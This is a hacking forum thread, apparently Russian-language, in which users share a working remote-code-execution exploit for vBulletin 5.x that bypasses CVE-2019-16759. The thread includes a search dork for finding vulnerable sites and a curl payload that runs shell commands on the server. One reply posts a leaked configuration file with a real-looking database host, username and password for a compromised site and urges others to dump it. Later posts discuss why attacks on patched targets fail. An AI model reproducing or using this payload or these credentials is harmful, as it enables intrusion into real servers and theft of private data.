RCE, vBulletin 5xx, CVE-N/A (Bypass CVE-2019-16759)

phant0m

CD-диск
Пользователь
Регистрация
01.05.2020
Сообщения
11
Реакции
16
0day RCE exploit on vBulletin 5xx

dork
Код:
intext:"Powered by vBulletin"

POC
Код:
curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

EfDNzL5WAAAzTBq.png
 

w00du

ripper
КИДАЛА
Регистрация
22.10.2019
Сообщения
253
Реакции
72
Пожалуйста, обратите внимание, что пользователь заблокирован
good job
 

xp3rt

floppy-диск
Пользователь
Регистрация
12.08.2020
Сообщения
1
Реакции
2
Yeah it's nice RCE, hopefully we have dumped good DBs. Let me start my contribution by sharing from this POC.


// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database
// will be located. Currently the only option is mysqli. MariaDB uses the same
// libaries as Mysql and should use mysqli as the dbtype. For slave support add
// _slave to the end of the database class.
$config['Database']['dbtype'] = 'mysqli';

// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
$config['Database']['dbname'] = '31233_endometr2';

// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'deep@datasentral.no';


// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put here, leave the default values.
//
// Note: If you are using IIS 7+ and MySQL is on the same machine, you
// need to use 127.0.0.1 instead of localhost
$config['MasterServer']['servername'] = 'sql31.mcb.webhuset.no';
$config['MasterServer']['port'] = 3306;

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = '31233_endometr2';
$config['MasterServer']['password'] = '3TAjoVI';

Please help yourself to dump it.
 

h4x0rb0y

floppy-диск
Пользователь
Регистрация
05.08.2020
Сообщения
3
Реакции
1
[QUOTE = "phant0m, post: 249811, member: 196571"]
0day RCE exploit on vBulletin 5xx

dork
Код:
 intext: "Powered by vBulletin" [/ CODE]

POC
[CODE] curl -s http: // SITE / ajax / render / widget_tabbedcontainer_tab_panel -d 'subWidgets [0] [template] = widget_php & subWidgets [0] [config] [code] = echo% 20shell_exec ("id"); exit; '[/ CODE]

[ATTACH = full] 13040 [/ ATTACH]
[/ QUOTE]

”What is the name of the checker program?
 

phant0m

CD-диск
Пользователь
Регистрация
01.05.2020
Сообщения
11
Реакции
16
[QUOTE = "phant0m, post: 249811, member: 196571"]
0day RCE exploit on vBulletin 5xx

dork
Код:
 intext: "Powered by vBulletin" [/ CODE]

POC
[CODE] curl -s http: // SITE / ajax / render / widget_tabbedcontainer_tab_panel -d 'subWidgets [0] [template] = widget_php & subWidgets [0] [config] [code] = echo% 20shell_exec ("id"); exit; '[/ CODE]

[ATTACH = full] 13040 [/ ATTACH]
[/ QUOTE]

”What is the name of the checker program?

Burp Suite
 

buyacc

HDD-drive
Пользователь
Регистрация
19.07.2019
Сообщения
35
Реакции
21
0day RCE exploit on vBulletin 5xx

dork
Код:
intext:"Powered by vBulletin"

POC
Код:
curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

Can you help me please?
When I try to repeat this I get blank page or something like this
Код:
{"template":"","css_links":[]}
What can be wrong?
I tried on different 5.x.x versions Vbull
 

phant0m

CD-диск
Пользователь
Регистрация
01.05.2020
Сообщения
11
Реакции
16
Can you help me please?
When I try to repeat this I get blank page or something like this
Код:
{"template":"","css_links":[]}
What can be wrong?
I tried on different 5.x.x versions Vbull

Maybe you are trying to attack patched version
 
Верх